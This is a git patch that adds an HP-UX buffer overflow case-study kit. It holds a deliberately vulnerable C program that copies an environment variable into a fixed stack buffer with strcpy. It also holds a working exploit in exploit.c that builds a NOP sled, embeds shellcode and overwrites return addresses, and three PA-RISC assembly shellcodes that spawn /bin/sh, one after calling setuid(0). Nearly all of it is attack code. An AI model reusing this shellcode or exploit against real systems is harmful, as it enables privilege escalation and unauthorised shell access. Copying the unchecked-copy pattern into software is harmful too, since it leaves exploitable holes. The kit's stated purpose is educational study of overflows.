From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/tmp/hpux-tools.tar.gz | Bin 0 -> 2550 bytes other/shellkit/tmp/hpux-tools/Makefile | 5 + other/shellkit/tmp/hpux-tools/README | 10 ++ other/shellkit/tmp/hpux-tools/sample-one/Makefile | 10 ++ other/shellkit/tmp/hpux-tools/sample-one/README | 5 + other/shellkit/tmp/hpux-tools/sample-one/exploit.c | 123 +++++++++++++++++++++ other/shellkit/tmp/hpux-tools/sample-one/vuln.c | 34 ++++++ other/shellkit/tmp/hpux-tools/shell-one.s | 39 +++++++ other/shellkit/tmp/hpux-tools/shell-tree.s | 31 ++++++ other/shellkit/tmp/hpux-tools/shell-two.s | 41 +++++++ other/shellkit/tmp/hpux_bof.pdf | Bin 0 -> 243787 bytes 11 files changed, 298 insertions(+) create mode 100644 other/shellkit/tmp/hpux-tools.tar.gz create mode 100644 other/shellkit/tmp/hpux-tools/Makefile create mode 100644 other/shellkit/tmp/hpux-tools/README create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/Makefile create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/README create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/exploit.c create mode 100644 other/shellkit/tmp/hpux-tools/sample-one/vuln.c create mode 100644 other/shellkit/tmp/hpux-tools/shell-one.s create mode 100644 other/shellkit/tmp/hpux-tools/shell-tree.s create mode 100644 other/shellkit/tmp/hpux-tools/shell-two.s create mode 100644 other/shellkit/tmp/hpux_bof.pdf (limited to 'other/shellkit/tmp') diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz new file mode 100644 index 0000000..6fa3a5e Binary files /dev/null and b/other/shellkit/tmp/hpux-tools.tar.gz differ diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile new file mode 100644 index 0000000..19e8fd4 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/Makefile @@ -0,0 +1,5 @@ +all: sample-one shell-one shell-two shell-tree + + +sample-one: + @cd sample-one && make diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README new file mode 100644 index 0000000..b6ee0df --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/README @@ -0,0 +1,10 @@ +This archive contains following files: +Makefile - make file to build the stuff +sample-one - example of exploit and vulnerable program +shell-one.s - shellcode (v1) +shell-tree.s - shellcode (v2) +shell-two.s - shellcode (v3) + + +-- +fygrave@tigerteam.net diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile new file mode 100644 index 0000000..aea8390 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile @@ -0,0 +1,10 @@ +all: exploit vuln + +exploit: exploit.c + gcc exploit.c -o exploit +vuln: vuln.c + gcc vuln.c -o vuln + + +clean: + @rm -f core *.core *.o vuln exploit a.out diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README new file mode 100644 index 0000000..66be971 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/README @@ -0,0 +1,5 @@ +These are examples for HP-UX buffer overflow case study. For more information +please see http://www.notlsd.net/bof/ + +-- +fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001 diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c new file mode 100644 index 0000000..11dc23c --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c @@ -0,0 +1,123 @@ +/* + * Sample exploit for HP-UX buffer overflows case study + */ +#include +#include + + +char shellcode[]= +"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02" +"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03" +"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA"; + +#define BUFFER_SIZE 180 +#define STACK_DSO -84 +#define NOP 0x0b390280 +#define PAD 0 +#define ALIGN 8 +#define ADB_PATH "/usr/bin/adb" +#define VULNVAR "VULNBUF=" +#define MORE 1 + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +int main(int argc, char **argv) { +int i, dso, align, padd, buf_size, adb, more; +char *buf, *ptr; +unsigned long retaddr; + + +dso = STACK_DSO; +align = ALIGN; +padd = PAD; +buf_size = BUFFER_SIZE; +retaddr = 0; +more = MORE; + + + + +while ((i = getopt(argc, argv, + "Dd:b:r:o:a:p:m:")) != EOF) { + switch (i) { + case 'd': + dso=(int) strtol(optarg, NULL, 0); + break; + case 'm': + more+=(int) strtol(optarg, NULL, 0); + break; + case 'b': + buf_size=(int)strtol(optarg, NULL, 0); + break; + case 'r': + retaddr = strtoul(optarg, NULL, 0); + break; + case 'a': + align = (int) strtol(optarg, NULL, 0); + break; + case 'p': + padd = (int) strtol(optarg, NULL, 0); + break; + case 'D': + adb = 1; + break; + default: + fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] " + "[-r return_address]" + "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]); + exit(1); + break; + } +} + + +buf=(char *)calloc(strlen(VULNVAR) + buf_size + + sizeof(unsigned long)*more + 1, 1); +ptr=buf; +if (!buf) { + perror("calloc"); + exit(1); +} + +fprintf(stderr,"our stack %X\n",get_sp()); +if (!retaddr) + retaddr=get_sp()- dso + 3; +fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i" + " buf_len: %i dso: %i more: %i\n", + retaddr, padd, align, buf_size, dso, more); + +strcpy(buf, VULNVAR); +ptr+=strlen(VULNVAR); +for(i=0;i>24)&0xff; + *ptr++=(NOP>>16)&0xff; + *ptr++=(NOP>>8)&0xff; + *ptr++=(NOP)&0xff; +} + +strcat(buf, shellcode); // append shellcode +ptr+=strlen(shellcode); + +for(i=0;i>24)&0xff; + *ptr++=(retaddr>>16)&0xff; + *ptr++=(retaddr>>8)&0xff; + *ptr++=(retaddr)&0xff; +} +fprintf(stderr,"buflen is %i\n", strlen(buf)); +putenv(buf,1); +if (adb) + execl(ADB_PATH,"adb","vuln", NULL); +else + execl("./vuln","vuln",buf, NULL); +perror("execl"); +return 0; // uff +} diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c new file mode 100644 index 0000000..698af76 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c @@ -0,0 +1,34 @@ +/* + * Sample vulnerable program for HP-UX buffer overflows case study + */ +#include +#include + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +void baz(char *argument) { + char badbuf[200]; + + printf("badbuf ptr is: %p\n",badbuf); + strcpy(badbuf,argument); +} + +void foo(char *arg) { + + baz(arg); + +} + +int main(int argc, char **argv) { +char *param; + +printf("vuln stack is: 0x%X\n",get_sp()); +param=getenv("VULNBUF"); +foo(param); + +return 0; +} diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s new file mode 100644 index 0000000..afbf9f8 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-one.s @@ -0,0 +1,39 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 23, %r22 + +jump + bl .+8,%r1 ; address into %r1 + nop + stb %r0, SHELL-jump+7-11(%sr0,%r1) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11, %r26; + add %r1, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 11, %r22; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 1, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s new file mode 100644 index 0000000..c3044da --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-tree.s @@ -0,0 +1,31 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-shellcode-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s new file mode 100644 index 0000000..5dac10f --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-two.s @@ -0,0 +1,41 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 523, %r22, %r22 ; setuid(0) +jump + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-jump+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 501, %r22, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf new file mode 100644 index 0000000..6d2a957 Binary files /dev/null and b/other/shellkit/tmp/hpux_bof.pdf differ -- cgit v1.3